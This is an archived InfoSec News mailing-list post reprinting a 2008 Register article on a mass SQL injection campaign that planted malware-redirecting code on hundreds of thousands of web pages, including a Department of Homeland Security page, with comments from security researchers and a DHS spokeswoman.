[ISN] Department of Homeland Security website hacked!

From: InfoSec News (alerts@private)
Date: Mon Apr 28 2008 - 23:52:59 PDT


http://www.theregister.co.uk/2008/04/25/mass_web_attack_grows/

By Dan Goodin
The Register
25th April 2008

The sophisticated mass infection that's injecting attack code into 
hundreds of thousands of reputable web pages is growing and even 
infiltrated the website of the Department of Homeland Security.

While so-called SQL injections are nothing new, this latest attack, 
which we we reported earlier, is notable for its ability to infect huge 
numbers of pages using only a single string of text. At time of writing, 
Google searches here, here and here showed almost 520,000 pages 
containing the infection string, though the exact number changes almost 
constantly. As the screenshot below shows, even the DHS, which is 
responsible for protecting US infrastructure against cyber attacks, 
wasn't immune. Other hacked sites include those belonging to the United 
Nations and the UK Civil Service.

The attack causes infected sites to redirect visitors to destinations 
that attempt to install malware on vulnerable machines. At time of 
writing, the malicious payloads attacked vulnerabilities that already 
have been patched. And in any case all three of the redirection sites 
were down, possibly because they were unable to handle the demand. But 
should the attackers get their hands on a newer exploit - say, one 
targeting a zero-day vulnerability in QuickTime - it would be relatively 
easy for them to swap out the payload.

One reason the infection has spread so widely is the attackers have 
managed to find a single attack string that seems to work on tens of 
thousands of different sites. Most web applications are custom -built 
for a particular site, so attackers likewise have to custom design 
attack parameters to exploit weakness. Not so here.

"These guys look like they've found a methodology to get a successful 
SQL injection generically across [many] websites," said Jeremiah 
Grossman, CTO of WhiteHat Security, which helps companies secure web 
applications. "That right there is like a skeleton key."

The script is also notable for its ability to slip past web application 
defenses. The SQL query is mostly made up of HEX code, allowing it to 
obscure itself, at least to apps that use Microsoft SQL. MySQL and 
PostgreSQL are less easily fooled, according to researcher Ronald van 
den Heetkamp.

Sites are getting pwned because they fail to sanitize user supplied 
data. DHS security pros scrubbed the page clean the same day it got 
infected and took steps to make sure the same attack couldn't succeed 
against other parts of the DHS website, spokeswoman Amy Kudwa said.

"We're well aware of the fact that intrusions happen all the time and 
that's why we are doing all that we are to secure the .gov domain," she 
said.

In a recent interview with The Register, Greg Garcia, the DHS's 
assistant secretary for cybersecurity and telecommunications said: "our 
networks really are only as strong as the weakest link and because we 
are so interconnected, if there are companies that are not doing what 
they need to do to protect their networks, that in turn may be 
jeopardizing the security of companies that very well may be doing the 
right thing." (For the full interview, click here.)

While the number of pages that have been infected is high, not all are 
able to launch an attack once a user visits them, according to Roger 
Thompson, chief research officer of anti-virus provider AVG.

"Very often they're on a page but the stuff doesn't actually fire when 
you get there," he said. "This is not a cunning, premeditated task; it's 
just a blast. They're just planting the stuff where they can and the 
result is a lot of pages [that] don't do anything."

But webmasters should not be complacent about removing the injected code 
from their sites and fixing buggy web apps to make sure more don't 
spring up.

"It's the cleanup effort that's just going to be monstrous," said 
Grossman, who said affected companies will have to either remove each 
overwritten table record one at a time, or revert to a recent backup. 
"Either way, it's going to take forever."

Security workers better get cracking.


_______________________________________________      
Subscribe to the InfoSec News RSS Feed
http://www.infosecnews.org/isn.rss



This archive was generated by hypermail 2.1.3 : Tue Apr 29 2008 - 00:05:30 PDT